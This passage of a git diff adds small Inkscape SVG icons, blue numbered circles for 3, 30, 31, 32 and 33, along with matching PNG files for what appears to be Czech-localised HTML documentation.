-0.154948,-0.475904 -0.232422,-1.020988 -0.232422,-1.635253 0,-0.65852 0.09131,-1.247875 0.273926,-1.768067 0.18815,-0.520172 0.453775,-0.960113 0.796875,-1.319824 0.343097,-0.365223 0.758136,-0.644682 1.245117,-0.838379 0.49251,-0.1936727 1.043128,-0.2905151 1.651856,-0.2905274 0.597651,1.23e-5 1.15657,0.1079224 1.676758,0.3237304 0.520175,0.210298 0.971184,0.534028 1.353027,0.971192 0.381828,0.437185 0.683423,0.990569 0.904785,1.660156 0.221346,0.669605 0.332023,1.458178 0.332031,2.365722 m -4.216796,-3.262207 c -0.226893,1.1e-5 -0.434412,0.04151 -0.622559,0.124512 -0.188155,0.08302 -0.351403,0.213063 -0.489746,0.390137 -0.132816,0.171559 -0.237959,0.392913 -0.31543,0.664062 -0.07194,0.265634 -0.107913,0.581063 -0.10791,0.946289 -3e-6,0.586596 0.124509,1.05144 0.373535,1.394532 0.24902,0.343105 0.625322,0.514654 1.128906,0.514648 0.254553,6e-6 0.486975,-0.0498 0.697266,-0.149414 0.210281,-0.0996 0.390131,-0.229648 0.539551,-0.390137 0.149408,-0.160475 0.262852,-0.340325 0.340332,-0.53955 0.083,-0.199212 0.124505,-0.401197 0.124512,-0.605958 -7e-6,-0.282218 -0.03598,-0.561677 -0.107911,-0.838378 -0.06641,-0.282218 -0.171555,-0.534008 -0.315429,-0.755372 -0.138352,-0.226878 -0.312669,-0.409495 -0.52295,-0.547851 -0.204757,-0.138336 -0.44548,-0.207509 -0.722167,-0.20752"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/3.png b/tmp/cs-CZ/html/Common_Content/images/3.png
new file mode 100644
index 000000000..a4754f061
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/3.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/3.svg b/tmp/cs-CZ/html/Common_Content/images/3.svg
new file mode 100644
index 000000000..e2f17168d
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/3.svg
@@ -0,0 +1,27 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:start;text-anchor:start;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 19.422316,12.587051 c -9e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.23243,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315437,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.392911,0.332031 -0.890957,0.592122 -1.494141,0.780273 -0.597661,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267255,-0.05534 -1.842773,-0.166016 -0.575523,-0.105143 -1.112306,-0.268392 -1.610352,-0.489746 l 0,-2.183105 c 0.249023,0.132815 0.511881,0.249025 0.788574,0.348632 0.276692,0.09961 0.553384,0.185387 0.830079,0.257325 0.27669,0.06641 0.547848,0.116212 0.813476,0.149414 0.271156,0.0332 0.525713,0.04981 0.763672,0.0498 0.475907,2e-6 0.871577,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567214,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320957,-0.351397 0.398437,-0.572754 0.083,-0.226885 0.124506,-0.473141 0.124512,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.265631,-0.376297 -0.498047,-0.514648 -0.226893,-0.143876 -0.525721,-0.254553 -0.896484,-0.332032 -0.370773,-0.07747 -0.827315,-0.116205 -1.369629,-0.116211 l -0.863281,0 0,-1.801269 0.846679,0 c 0.509111,7e-6 0.932451,-0.04426 1.27002,-0.132813 0.33756,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.43164,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.68897,-0.365224 -1.27002,-0.365234 -0.265629,10e-6 -0.514652,0.02768 -0.74707,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193688,0.07748 -0.373538,0.166026 -0.539551,0.265625 -0.160484,0.09409 -0.307131,0.188161 -0.439941,0.282227 l -1.294922,-1.709961 c 0.232421,-0.171538 0.484211,-0.329253 0.755371,-0.473145 0.276691,-0.143868 0.575519,-0.26838 0.896484,-0.373535 0.320961,-0.1106647 0.666827,-0.1964393 1.037598,-0.2573239 0.370765,-0.06086 0.766435,-0.091296 1.187012,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492506,0.1272911 0.913079,0.3154421 1.261718,0.5644531 0.348626,0.243501 0.617017,0.545096 0.805176,0.904786 0.193677,0.354177 0.290519,0.760914 0.290528,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/30.png b/tmp/cs-CZ/html/Common_Content/images/30.png
new file mode 100644
index 000000000..9d3db242d
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/30.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/30.svg b/tmp/cs-CZ/html/Common_Content/images/30.svg
new file mode 100644
index 000000000..5cdcf65e8
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/30.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.6378,15.940567 c -9e-6,0.979497 -0.07748,1.853845 -0.232422,2.623047 -0.149422,0.769208 -0.392912,1.422202 -0.730468,1.958984 -0.332039,0.536785 -0.763679,0.94629 -1.294922,1.228516 -0.525722,0.282226 -1.162115,0.42334 -1.90918,0.42334 -0.702803,0 -1.314294,-0.141114 -1.834473,-0.42334 -0.520184,-0.282226 -0.951824,-0.691731 -1.294922,-1.228516 -0.3431,-0.536782 -0.600424,-1.189776 -0.771972,-1.958984 -0.166016,-0.769202 -0.249024,-1.64355 -0.249024,-2.623047 0,-0.979485 0.07471,-1.8566 0.224121,-2.631348 0.154948,-0.77473 0.398437,-1.430491 0.730469,-1.967285 0.33203,-0.536772 0.760903,-0.946277 1.286621,-1.228515 0.525713,-0.2877487 1.162106,-0.4316287 1.90918,-0.431641 0.69726,1.23e-5 1.305984,0.1411254 1.826172,0.42334 0.520175,0.282238 0.954582,0.691743 1.303223,1.228515 0.348624,0.536794 0.608715,1.192555 0.780273,1.967286 0.171541,0.774747 0.257315,1.654629 0.257324,2.639648 m -5.760742,0 c -3e-6,1.383468 0.118975,2.423832 0.356934,3.121094 0.237952,0.697268 0.650223,1.0459 1.236816,1.045898 0.575516,2e-6 0.987787,-0.345863 1.236816,-1.037597 0.254552,-0.691729 0.38183,-1.734859 0.381836,-3.129395 -6e-6,-1.38899 -0.127284,-2.43212 -0.381836,-3.129395 -0.249029,-0.702789 -0.6613,-1.054188 -1.236816,-1.054199 -0.293299,1.1e-5 -0.542322,0.08855 -0.74707,0.265625 -0.199223,0.177093 -0.362471,0.439951 -0.489746,0.788574 -0.127282,0.348642 -0.218591,0.785816 -0.273926,1.311524 -0.05534,0.52019 -0.08301,1.126146 -0.08301,1.817871"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/31.png b/tmp/cs-CZ/html/Common_Content/images/31.png
new file mode 100644
index 000000000..9e2675da5
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/31.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/31.svg b/tmp/cs-CZ/html/Common_Content/images/31.svg
new file mode 100644
index 000000000..f0fdb294d
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/31.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 22.579206,22.008438 -2.564941,0 0,-7.022461 c -4e-6,-0.143873 -4e-6,-0.315422 0,-0.514648 0.0055,-0.204745 0.01106,-0.415031 0.0166,-0.63086 0.01106,-0.221345 0.01936,-0.442699 0.0249,-0.664062 0.01106,-0.221345 0.01936,-0.423331 0.0249,-0.605957 -0.02767,0.03321 -0.07471,0.08302 -0.141113,0.149414 -0.06641,0.06642 -0.141117,0.141122 -0.224121,0.224121 -0.08301,0.07748 -0.168786,0.157724 -0.257324,0.240723 -0.08855,0.08302 -0.17432,0.157723 -0.257325,0.224121 l -1.394531,1.120605 -1.245117,-1.543945 3.909668,-3.1127931 2.108398,0 0,12.1357421"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/32.png b/tmp/cs-CZ/html/Common_Content/images/32.png
new file mode 100644
index 000000000..20f1bb23c
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/32.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/32.svg b/tmp/cs-CZ/html/Common_Content/images/32.svg
new file mode 100644
index 000000000..938292810
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/32.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.621199,22.008438 -8.143067,0 0,-1.784668 2.855469,-3.07959 c 0.359697,-0.387364 0.686194,-0.744297 0.979492,-1.0708 0.29329,-0.326492 0.54508,-0.644688 0.755371,-0.95459 0.210281,-0.309889 0.37353,-0.625318 0.489746,-0.946289 0.116205,-0.320956 0.174311,-0.666821 0.174317,-1.037598 -6e-6,-0.409496 -0.124518,-0.727692 -0.373535,-0.95459 -0.243495,-0.226878 -0.572759,-0.340322 -0.987793,-0.340332 -0.437179,10e-6 -0.857751,0.10792 -1.261719,0.323731 -0.403974,0.215829 -0.827314,0.522958 -1.27002,0.921386 l -1.394531,-1.651855 c 0.249023,-0.226877 0.509114,-0.442698 0.780274,-0.647461 0.271157,-0.210275 0.569985,-0.395659 0.896484,-0.556152 0.326495,-0.16047 0.686195,-0.2877488 1.079101,-0.3818364 0.3929,-0.099597 0.832841,-0.1494018 1.319825,-0.1494141 0.581049,1.23e-5 1.101231,0.080253 1.560547,0.2407227 0.464837,0.1604938 0.860507,0.3901488 1.187011,0.6889648 0.32649,0.293305 0.575513,0.650239 0.747071,1.070801 0.177075,0.420583 0.265616,0.893727 0.265625,1.419433 -9e-6,0.47592 -0.08302,0.932463 -0.249024,1.369629 -0.166024,0.431648 -0.392911,0.857754 -0.680664,1.278321 -0.287768,0.415044 -0.622565,0.830083 -1.004394,1.245117 -0.376309,0.40951 -0.78028,0.827315 -1.211914,1.253418 l -1.460938,1.469238 0,0.116211 4.947266,0 0,2.158203"
+       id="path2820"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+  </g>
+</svg>
diff --git a/tmp/cs-CZ/html/Common_Content/images/33.png b/tmp/cs-CZ/html/Common_Content/images/33.png
new file mode 100644
index 000000000..01407e6bc
Binary files /dev/null and b/tmp/cs-CZ/html/Common_Content/images/33.png differ
diff --git a/tmp/cs-CZ/html/Common_Content/images/33.svg b/tmp/cs-CZ/html/Common_Content/images/33.svg
new file mode 100644
index 000000000..f46815f7e
--- /dev/null
+++ b/tmp/cs-CZ/html/Common_Content/images/33.svg
@@ -0,0 +1,31 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!-- Created with Inkscape (http://www.inkscape.org/) -->
+
+<svg
+   xmlns:svg="http://www.w3.org/2000/svg"
+   xmlns="http://www.w3.org/2000/svg"
+   version="1.0"
+   width="32"
+   height="32"
+   id="svg2">
+  <defs
+     id="defs15" />
+  <circle
+     cx="16"
+     cy="16"
+     r="14"
+     id="circle"
+     style="fill:#336699" />
+  <g
+     id="text2820"
+     style="font-size:10px;font-style:normal;font-variant:normal;font-weight:normal;font-stretch:normal;text-align:center;text-anchor:middle;fill:#ffffff;fill-opacity:1;stroke:none;font-family:Droid Sans;-inkscape-font-specification:Droid Sans">
+    <path
+       d="m 14.784773,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.20752,1.137207 -0.13282,0.33204 -0.318204,0.625334 -0.556152,0.879883 -0.232429,0.249031 -0.509122,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979485,0.121751 1.721021,0.420579 2.224609,0.896485 0.503573,0.470382 0.755363,1.106775 0.755371,1.909179 -8e-6,0.531253 -0.09685,1.023766 -0.290527,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879883,1.170411 -0.39291,0.332031 -0.890957,0.592122 -1.49414,0.780273 -0.597662,0.182617 -1.303228,0.273926 -2.1167,0.273926 -0.6529976,0 -1.2672548,-0.05534 -1.842773,-0.166016 C 7.9421607,21.903295 7.4053774,21.740046 6.9073315,21.518692 l 0,-2.183105 c 0.2490227,0.132815 0.5118805,0.249025 0.7885742,0.348632 0.2766912,0.09961 0.5533836,0.185387 0.8300781,0.257325 0.2766904,0.06641 0.5478489,0.116212 0.8134766,0.149414 0.2711557,0.0332 0.5257127,0.04981 0.7636716,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315424,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188145,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124511,-0.73877 -6e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.204748 -0.26563,-0.376297 -0.498046,-0.514648 C 11.685809,16.992 11.386981,16.881323 11.016218,16.803844 10.645446,16.726374 10.188903,16.687639 9.6465893,16.687633 l -0.8632813,0 0,-1.801269 0.8466797,0 c 0.5091113,7e-6 0.9324503,-0.04426 1.2700193,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124511,-0.672363 -5e-6,-0.431632 -0.135585,-0.769197 -0.406738,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,10e-6 -0.514653,0.02768 -0.7470708,0.08301 -0.2268911,0.04981 -0.4399443,0.116221 -0.6391601,0.199218 -0.1936875,0.07748 -0.3735376,0.166026 -0.5395508,0.265625 -0.1604838,0.09409 -0.3071308,0.188161 -0.4399414,0.282227 L 6.923933,10.893692 c 0.2324212,-0.171538 0.4842113,-0.329253 0.7553711,-0.473145 0.2766912,-0.143868 0.575519,-0.26838 0.8964844,-0.373535 0.3209611,-0.1106647 0.6668266,-0.1964393 1.0375977,-0.2573239 0.3707646,-0.06086 0.7664348,-0.091296 1.1870118,-0.091309 0.597651,1.23e-5 1.139968,0.066419 1.626953,0.1992188 0.492507,0.1272911 0.913079,0.3154421 1.261719,0.5644531 0.348625,0.243501 0.617017,0.545096 0.805176,0.904786 0.193676,0.354177 0.290519,0.760914 0.290527,1.220214"
+       id="path2818"
+       style="font-size:17px;font-weight:bold;fill:#ffffff;-inkscape-font-specification:Bitstream Vera Sans Bold" />
+    <path
+       d="m 24.148054,12.587051 c -8e-6,0.420582 -0.06918,0.799651 -0.207519,1.137207 -0.132821,0.33204 -0.318205,0.625334 -0.556153,0.879883 -0.232429,0.249031 -0.509121,0.459317 -0.830078,0.63086 -0.315436,0.166022 -0.658535,0.2933 -1.029297,0.381836 l 0,0.0498 c 0.979486,0.121751 1.721021,0.420579 2.22461,0.896485 0.503572,0.470382 0.755362,1.106775 0.755371,1.909179 -9e-6,0.531253 -0.09685,1.023766 -0.290528,1.477539 -0.188159,0.448244 -0.481453,0.83838 -0.879882,1.170411 -0.392911,0.332031 -0.890958,0.592122 -1.494141,0.780273 -0.597662,0.182617 -1.303227,0.273926 -2.116699,0.273926 -0.652998,0 -1.267256,-0.05534 -1.842774,-0.166016 -0.575522,-0.105143 -1.112305,-0.268392 -1.610351,-0.489746 l 0,-2.183105 c 0.249022,0.132815 0.51188,0.249025 0.788574,0.348632 0.276691,0.09961 0.553384,0.185387 0.830078,0.257325 0.27669,0.06641 0.547849,0.116212 0.813477,0.149414 0.271155,0.0332 0.525712,0.04981 0.763671,0.0498 0.475908,2e-6 0.871578,-0.04427 1.187012,-0.132812 0.315425,-0.08854 0.567215,-0.213051 0.755371,-0.373535 0.188146,-0.16048 0.320958,-0.351397 0.398438,-0.572754 0.083,-0.226885 0.124505,-0.473141 0.124512,-0.73877 -7e-6,-0.249019 -0.05258,-0.47314 -0.157715,-0.672363 -0.09962,-0.20474 -0.265631,-0.376289 -0.498047,-0.51464 -0.226893,-0.143876 -0.525721,-0.254553 -0.896485,-0.332032 -0.370772,-0.07747 -0.827315,-0.116205 -1.369628,-0.116211 l -0.863282,0 0,-1.801269 0.84668,0 c 0.509111,7e-6 0.93245,-0.04426 1.270019,-0.132813 0.337561,-0.09407 0.605952,-0.218579 0.805176,-0.373535 0.204747,-0.160474 0.348627,-0.345858 0.431641,-0.556152 0.083,-0.210278 0.124506,-0.434399 0.124512,-0.672363 -6e-6,-0.431632 -0.135585,-0.769197 -0.406739,-1.012696 -0.26563,-0.243479 -0.688969,-0.365224 -1.270019,-0.365234 -0.265629,1e-5 -0.514652,0.02768 -0.747071,0.08301 -0.226891,0.04981 -0.439944,0.116221 -0.63916,0.199218 -0.193687,0.07748 -0.373537,0.166026 -0.53955,0.265625 